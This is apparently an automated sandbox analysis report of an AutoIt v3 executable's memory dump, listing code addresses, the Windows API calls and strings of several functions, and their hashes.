                0x0041dd42
                0x0041dd48
                0x0041dd4d
                0x0041dd50
                0x0041dd57
                0x0041dd7c
                0x0041dd81
                0x00000000
                0x00000000
                0x0041dd87
                0x0041dd87
                0x0041dd89
                0x0041dd89
                0x0041dd8f
                0x0041dd97
                0x0041dd99
                0x0041dda5
                0x0041ddb2
                0x0041ddb8
                0x0041ddb8
                0x0041ddbe
                0x0041ddc5
                0x0041ddfc
                0x0041ddfe
                0x0041de07
                0x0041de09
                0x0041ddcb
                0x0041ddcf
                0x0041ddd3
                0x0041ddd5
                0x0041dddb
                0x0041dddb
                0x0041dde1
                0x0041dde3
                0x0041ddea
                0x0041ddf2
                0x0041ddf2
                0x0041de15
                0x0041de1c
                0x0041de22
                0x00000000
                0x0041de22
                0x0041dd5d
                0x0041dd62
                0x0041dd72
                0x00000000
                0x0041dd72
                0x0041dd68
                0x00000000
                0x0041dd68
                0x0041dcde
                0x0041dce5
                0x0041dce7
                0x0041dce9
                0x00000000
                0x00000000
                0x0041dcef
                0x0041dd01
                0x0041dd01
                0x0041dd07
                0x0041dd09
                0x0041dd10
                0x0041dd16
                0x0041dd16
                0x0041dd1c
                0x0041dd21
                0x0041dd27
                0x0041dd2b
                0x00000000
                0x0041dd2b
                0x0041dcf5
                0x0041dcfb
                0x00000000
                0x00000000
                0x00000000
                0x003f954a
                0x003f954d
                0x003f9721
                0x003f9727
                0x003f972e
                0x003f9755
                0x003f9755
                0x003f975b
                0x003f975e
                0x00000000
                0x00000000
                0x0041de46
                0x0041de49
                0x0041de4c
                0x00000000
                0x0041de52
                0x0041de52
                0x00000000
                0x0041de82
                0x00000000
                0x00000000
                0x0041df62
                0x0041df67
                0x0041df69
                0x0041df6b
                0x00000000
                0x00000000
                0x0041df71
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0041de5a
                0x0041de87
                0x0041de87
                0x0041de89
                0x0041de8b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0041de65
                0x0041de6a
                0x0041de6c
                0x0041de6e
                0x0041de91
                0x0041de9a
                0x0041de9f
                0x0041dea9
                0x0041deaf
                0x0041deb7
                0x0041debc
                0x0041debe
                0x0041debe
                0x00000000
                0x00000000
                0x0041dec4
                0x0041dec6
                0x0041df3a
                0x0041df40
                0x0041df41
                0x0041df48
                0x0041df52
                0x0041df57
                0x00000000
                0x0041df57
                0x0041decc
                0x0041decc
                0x0041ded2
                0x0041ded5
                0x0041dee4
                0x0041def5
                0x0041defc
                0x0041df07
                0x0041df0e
                0x0041df13
                0x0041df1b
                0x0041df1b
                0x0041df1e
                0x0041df29
                0x0041df30
                0x0041df35
                0x00000000
                0x0041df35
                0x0041dedb
                0x0041dede
                0x00000000
                0x00000000
                0x00000000
                0x0041dede
                0x0041de74
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0041de52
                0x003f9770
                0x003f9770
                0x003f9770
                0x003f9775
                0x00000000
                0x00000000
                0x003f9780
                0x003f9785
                0x003f978a
                0x003f978c
                0x003f9798
                0x003f979d
                0x003f979f
                0x003f97a6
                0x003f97ac
                0x003f97b1
                0x003f97b1
                0x003f979f
                0x003f97bf
                0x003f97c4
                0x003f97c6
                0x003f97c8
                0x003f94c0
                0x003f94c7
                0x0041d779
                0x0041d780
                0x0041d787
                0x0041d787
                0x003f94d4
                0x0041e0c6
                0x0041e0cc
                0x0041e0d4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f97ce
                0x00000000
                0x003f97ce
                0x003f97c8
                0x0041d763
                0x0041d76a
                0x00000000
                0x0041d76a
                0x003f9736
                0x003f973b
                0x003f973d
                0x003f973f
                0x00000000
                0x00000000
                0x003f9741
                0x003f9743
                0x003f97dc
                0x003f97dc
                0x003f97e3
                0x0041de32
                0x0041de38
                0x0041de3c
                0x0041de3c
                0x003f97e9
                0x003f97e9
                0x003f97f0
                0x00000000
                0x003f97f0
                0x003f9749
                0x003f974f
                0x00000000
                0x00000000
                0x00000000
                0x003f9577
                0x003f9577
                0x003f957a
                0x003f9580
                0x003f9582
                0x003f9583
                0x003f9586
                0x003f958c
                0x0041df7c
                0x0041df7c
                0x00000000
                0x003f959a
                0x003f959d
                0x003f95a3
                0x00000000
                0x00000000
                0x003f95a9
                0x003f95ab
                0x003f95b0
                0x003f95b4
                0x003f95b6
                0x003f95bc
                0x003f95fe
                0x003f9601
                0x003f96a0
                0x003f96a1
                0x003f96a4
                0x0041dffa
                0x0041dffa
                0x0041e005
                0x00000000
                0x0041e005
                0x003f96b1
                0x00000000
                0x003f96c5
                0x003f96c7
                0x003f96ce
                0x003f96d5
                0x003f96dd
                0x003f96e1
                0x003f96e3
                0x003f96e5
                0x003f96f0
                0x003f96f5
                0x003f96f7
                0x003f96f9
                0x003f96fc
                0x003f9700
                0x003f9703
                0x003f9708
                0x0041df8b
                0x0041df93
                0x0041df93
                0x003f9708
                0x003f970e
                0x003f9715
                0x00000000
                0x00000000
                0x003f96bb
                0x00000000
                0x00000000
                0x0041df9d
                0x0041dfa4
                0x0041dfa9
                0x0041dfab
                0x0041dfc7
                0x0041dfce
                0x0041dfd3
                0x0041dfd5
                0x0041dfdb
                0x0041dfde
                0x0041dfe2
                0x0041dfe5
                0x0041dff0
                0x0041dff0
                0x0041dfb1
                0x0041dfb1
                0x0041dfbc
                0x0041dfbc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f96b1
                0x003f960c
                0x003f9617
                0x003f961b
                0x003f9623
                0x003f9627
                0x003f962c
                0x003f962e
                0x003f9645
                0x003f9645
                0x003f9649
                0x003f964b
                0x003f9650
                0x003f9652
                0x003f9655
                0x003f9657
                0x0041e02c
                0x0041e02d
                0x0041e032
                0x0041e038
                0x0041e039
                0x0041e03e
                0x0041e03e
                0x003f965d
                0x003f965e
                0x003f9663
                0x003f9666
                0x003f9666
                0x003f966a
                0x003f966e
                0x003f9671
                0x0041e046
                0x0041e04a
                0x0041e04c
                0x0041e053
                0x0041e059
                0x0041e05a
                0x0041e05f
                0x0041e05f
                0x003f9677
                0x003f9677
                0x003f967a
                0x0041e067
                0x0041e06b
                0x0041e06d
                0x0041e074
                0x0041e074
                0x003f9680
                0x003f9680
                0x003f9683
                0x0041e082
                0x003f9689
                0x003f9689
                0x003f968c
                0x0041e08c
                0x0041e090
                0x0041e093
                0x0041e094
                0x0041e09c
                0x0041e09d
                0x0041e0a2
                0x003f9692
                0x003f9692
                0x003f9695
                0x0041e0aa
                0x0041e0ae
                0x0041e0b0
                0x0041e0b7
                0x0041e0b7
                0x0041e0b0
                0x003f9695
                0x003f968c
                0x003f9683
                0x003f967a
                0x00000000
                0x003f9671
                0x003f9630
                0x003f9637
                0x003f963a
                0x003f963f
                0x0041e00f
                0x0041e017
                0x0041e020
                0x00000000
                0x0041e020
                0x00000000
                0x003f95be
                0x003f95c4
                0x00000000
                0x003f95c4
                0x003f95bc
                0x003f958c
                0x003f954d
                0x003f953b
                0x003f949d
                0x0041d751
                0x0041d758
                0x00000000
                0x00000000
                0x0041d75e
                0x003f94ba
                0x00000000
                0x00000000
                0x00000000
                0x003f94ba
                0x00000000
                0x003f9480

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Message$Peek$DispatchSleepTranslate
                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                • API String ID: 1762048999-758534266
                • Opcode ID: 57c53dcf5b94ba3d8129dd36a77d28a374bb531e7a43e4e35821d8a180938a2e
                • Instruction ID: 440118ae44683f53f526efca64fa140b0b7227e5c9352bf6994b9e193797b156
                • Opcode Fuzzy Hash: 57c53dcf5b94ba3d8129dd36a77d28a374bb531e7a43e4e35821d8a180938a2e
                • Instruction Fuzzy Hash: 8E62E1B06083469FD726DF24C884BBBB7A4BF85304F10492FF65987251D778E889CB96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FE560, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 003FE5FF
                • __wsplitpath.LIBCMT ref: 003FE61C
                  • Part of subcall function 0040392E: __wsplitpath_helper.LIBCMT ref: 00403970
                • _wcsncat.LIBCMT ref: 003FE633
                • __wmakepath.LIBCMT ref: 003FE64F
                  • Part of subcall function 004039BE: __wmakepath_s.LIBCMT ref: 004039D4
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                • _wcscpy.LIBCMT ref: 003FE687
                  • Part of subcall function 003FE6C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,003FE6A1), ref: 003FE6DD
                • _wcscat.LIBCMT ref: 00417324
                • _wcslen.LIBCMT ref: 00417334
                • _wcslen.LIBCMT ref: 00417345
                • _wcscat.LIBCMT ref: 0041735F
                • _wcsncpy.LIBCMT ref: 0041739F
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                • String ID: Include$\
                • API String ID: 3173733714-3429789819
                • Opcode ID: 818547af53e7065e3a18a354dce6b34b0cfac52420b0df52dcce3bd969b7180d
                • Instruction ID: 293681fcbc11baee6398d42dea0459430fea0f233df5b2b6a600b3bfc331ecc5
                • Opcode Fuzzy Hash: 818547af53e7065e3a18a354dce6b34b0cfac52420b0df52dcce3bd969b7180d
                • Instruction Fuzzy Hash: 1951D0B14043059BE310EF69DC868AA73E8BB68304F40853FF599972A1E7759A44CB5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FA9D0, Relevance: 18.4, APIs: 8, Strings: 2, Instructions: 881COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _malloc
                • String ID: DZG$Default
                • API String ID: 1579825452-3579849055
                • Opcode ID: bb41b5b57e95f697acee15cdcf722bc15477fb9cc109b3d032e6ca4fd10086b7
                • Instruction ID: bb41a8e349b937a021ae2236a39f8acc057393d2619f235fdcb66f05c980733f
                • Opcode Fuzzy Hash: bb41b5b57e95f697acee15cdcf722bc15477fb9cc109b3d032e6ca4fd10086b7
                • Instruction Fuzzy Hash: D472ACB05043099FC715DF28C580A2BB7E5EF88314F15882EEA8A8B761D739EC45CB97
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004003E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                Download Yara Rule
                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 004003EB
                • LoadCursorW.USER32(00000000,00007F00), ref: 004003FA
                • LoadIconW.USER32 ref: 00400410
                • LoadIconW.USER32 ref: 00400423
                • LoadIconW.USER32 ref: 00400436
                • LoadImageW.USER32 ref: 0040045E
                • RegisterClassExW.USER32 ref: 004004AD
                  • Part of subcall function 004004E0: GetSysColorBrush.USER32(0000000F), ref: 00400513
                  • Part of subcall function 004004E0: RegisterClassExW.USER32 ref: 0040053D
                  • Part of subcall function 004004E0: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040054E
                  • Part of subcall function 004004E0: InitCommonControlsEx.COMCTL32(004990E8), ref: 0040056B
                  • Part of subcall function 004004E0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0040057B
                  • Part of subcall function 004004E0: LoadIconW.USER32 ref: 00400592
                  • Part of subcall function 004004E0: ImageList_ReplaceIcon.COMCTL32(013213F8,000000FF,00000000), ref: 004005A2
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                • String ID: #$0$AutoIt v3
                • API String ID: 423443420-4155596026
                • Opcode ID: 5f914dd888a37ceb3f4bcc44099f678cc387f1c9ec0936ea24d14bb95f452054
                • Instruction ID: 6f52d7f147ab47b6d3ad81a8845992c8e1cdcc23e64295f95ec345de912c4a66
                • Opcode Fuzzy Hash: 5f914dd888a37ceb3f4bcc44099f678cc387f1c9ec0936ea24d14bb95f452054
                • Instruction Fuzzy Hash: 3F215EB1D54314ABD710DFA9EC49BAE7BB4BB4C700F10447BE608A7290D7B49940CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004004E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 56windowregistryCOMMON
                Download Yara Rule
                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 00400513
                • RegisterClassExW.USER32 ref: 0040053D
                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040054E
                • InitCommonControlsEx.COMCTL32(004990E8), ref: 0040056B
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0040057B
                • LoadIconW.USER32 ref: 00400592
                • ImageList_ReplaceIcon.COMCTL32(013213F8,000000FF,00000000), ref: 004005A2
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                • String ID: +$0$TaskbarCreated
                • API String ID: 2914291525-888179712
                • Opcode ID: 7b6f18010de9b02d07ca0c5cdfcf7c4c70437746e70a902e1cbff38b2e50d43a
                • Instruction ID: 1b2e42f79018cbc02bfdc1f9daedc4279e23f06f2e29a1097c08d857e09b8f6d
                • Opcode Fuzzy Hash: 7b6f18010de9b02d07ca0c5cdfcf7c4c70437746e70a902e1cbff38b2e50d43a
                • Instruction Fuzzy Hash: E021C8B5901218AFDB10DFA8ED49BDDBBB4FB08710F10812AF618AA290D7B44584CF99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F1340, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129timewindowCOMMON
                Download Yara Rule
                APIs
                • DefWindowProcW.USER32(?,?,?,?), ref: 003F1376
                • KillTimer.USER32(?,00000001), ref: 003F13F9
                  • Part of subcall function 003F1240: _memset.LIBCMT ref: 003F126B
                  • Part of subcall function 003F1240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 003F129B
                • PostQuitMessage.USER32(00000000), ref: 003F140B
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow_memset
                • String ID: TaskbarCreated
                • API String ID: 1519149367-2362178303
                • Opcode ID: 16e0c13353de49fcc09752920254b0e20264c63cf595ff04476ed213437d9d14
                • Instruction ID: d12e08f907518e29ebfe93f648163c23f2ce64489d2947586cca8f4ca4f70acd
                • Opcode Fuzzy Hash: 16e0c13353de49fcc09752920254b0e20264c63cf595ff04476ed213437d9d14
                • Instruction Fuzzy Hash: CD41367660820CDBDB21DBA8FC85FBE7758E751320F11453BFA0487991C6B59C80839A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FFE90, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __fread_nolock_fseek_memmove
                • String ID: AU3!$EA06
                • API String ID: 3969463491-2658333250
                • Opcode ID: e31151c158dcbe4c0583fcbb92ad84b1172b62606df60092e62f85a08a29fb54
                • Instruction ID: 684778db8f03d5e0eb52d7cf3404b320ca3cac9db35853dc096237575af4f149
                • Opcode Fuzzy Hash: e31151c158dcbe4c0583fcbb92ad84b1172b62606df60092e62f85a08a29fb54
                • Instruction Fuzzy Hash: D8415E72A0424C9FDB12CF64C880FFD3B64AF5A304F6444BEFB45DB642E67495818B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004235B2, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00423229: _wcsncpy.LIBCMT ref: 00423241
                • _wcslen.LIBCMT ref: 004235D7
                • GetFileAttributesW.KERNELBASE(?), ref: 00423601
                • GetLastError.KERNEL32 ref: 00423610
                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00423624
                • _wcsrchr.LIBCMT ref: 0042364B
                  • Part of subcall function 004235B2: CreateDirectoryW.KERNEL32(?,00000000), ref: 0042368C
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                • String ID: \
                • API String ID: 321622961-2967466578
                • Opcode ID: 7673dc43ca92eb27a5f92398be8fcbdebd1627fad6e27c4a90866c3ddc0ad003
                • Instruction ID: 4aab2743144dbf57cc999754928ff046b0a922e4d6b7b1354b303d2b04179746
                • Opcode Fuzzy Hash: 7673dc43ca92eb27a5f92398be8fcbdebd1627fad6e27c4a90866c3ddc0ad003
                • Instruction Fuzzy Hash: CD210E71A0132466DB30AF64BC06BEB737CDF01715F4046ABFD18D2241E67D9A948AA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004014F7, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                Download Yara Rule
                APIs
                • _malloc.LIBCMT ref: 00401511
                  • Part of subcall function 004034DB: __FF_MSGBANNER.LIBCMT ref: 004034F4
                  • Part of subcall function 004034DB: __NMSG_WRITE.LIBCMT ref: 004034FB
                  • Part of subcall function 004034DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00406A35,?,00000001,?,?,00408179,00000018,0047D180,0000000C,00408209), ref: 00403520
                • std::exception::exception.LIBCMT ref: 00401546
                • std::exception::exception.LIBCMT ref: 00401560
                • __CxxThrowException@8.LIBCMT ref: 00401571
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                • String ID: ,*G$4*G$@fH
                • API String ID: 615853336-2081664741
                • Opcode ID: eec46f7751f958c493d7c0d5b07cbcd14074226086c2c413a781ed58a75373a9
                • Instruction ID: 25759bdf442917a4c2bd76853d3d1dbf0342a4a4476ca405277daf107041f176
                • Opcode Fuzzy Hash: eec46f7751f958c493d7c0d5b07cbcd14074226086c2c413a781ed58a75373a9
                • Instruction Fuzzy Hash: 80F0F9319001097BCB11FF55DC02A9E36A9EB80308F11847FF805B61E1DBBC9E048B4D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F1490, Relevance: 12.1, APIs: 8, Instructions: 86windowtimeCOMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 003F14BC
                  • Part of subcall function 003F1E00: _memset.LIBCMT ref: 003F1E90
                  • Part of subcall function 003F1E00: _wcsncpy.LIBCMT ref: 003F1ED2
                  • Part of subcall function 003F1E00: _wcscpy.LIBCMT ref: 003F1EF1
                  • Part of subcall function 003F1E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003F1F03
                • KillTimer.USER32(?,?,?,?,?), ref: 003F1513
                • SetTimer.USER32 ref: 003F1522
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00417BC8
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00417C1C
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00417C67
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                • String ID:
                • API String ID: 1792922140-0
                • Opcode ID: 55a3e70303a108b2413f333da568f75175f722da74eb96ceb1b5e44c7a65bd42
                • Instruction ID: ac129a8d5941c5aac00ce4d5d6d5383dcb7de392de1f086eda96855bdab12234
                • Opcode Fuzzy Hash: 55a3e70303a108b2413f333da568f75175f722da74eb96ceb1b5e44c7a65bd42
                • Instruction Fuzzy Hash: 2031A170A0865DFFEB67CB24DC99BE6FBBCFB46304F004195E28D56240C7746A848B96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FE700, Relevance: 10.7, APIs: 7, Instructions: 157COMMON
                Download Yara Rule
                APIs
                • GetVersionExW.KERNEL32(?), ref: 003FE72A
                  • Part of subcall function 003F2390: _wcslen.LIBCMT ref: 003F239D
                  • Part of subcall function 003F2390: _memmove.LIBCMT ref: 003F23C3
                • GetCurrentProcess.KERNEL32(?), ref: 003FE7D4
                • GetNativeSystemInfo.KERNELBASE(?), ref: 003FE832
                • FreeLibrary.KERNEL32(?), ref: 003FE842
                • FreeLibrary.KERNEL32(?), ref: 003FE854
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                • String ID:
                • API String ID: 3363477735-0
                • Opcode ID: 9e428fb3e0ec5dc39084db86738092cf343aa27a329e3780b881f1a4a16531dc
                • Instruction ID: bba7c42852ffcf4969871284e9584ff5195b8a69aef202b061caba6c17d302ea
                • Opcode Fuzzy Hash: 9e428fb3e0ec5dc39084db86738092cf343aa27a329e3780b881f1a4a16531dc
                • Instruction Fuzzy Hash: DD61D37080868AEECB11DFA4C8446EDFFB4BF09304F14456AD508A7B41C379A998CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FF3B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                Download Yara Rule
                APIs
                • SHGetMalloc.SHELL32(003FF1FC), ref: 003FF3BD
                • SHGetDesktopFolder.SHELL32(?,004990E8), ref: 003FF3D2
                • _wcsncpy.LIBCMT ref: 003FF3ED
                • SHGetPathFromIDListW.SHELL32(?,?), ref: 003FF427
                • _wcsncpy.LIBCMT ref: 003FF440
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
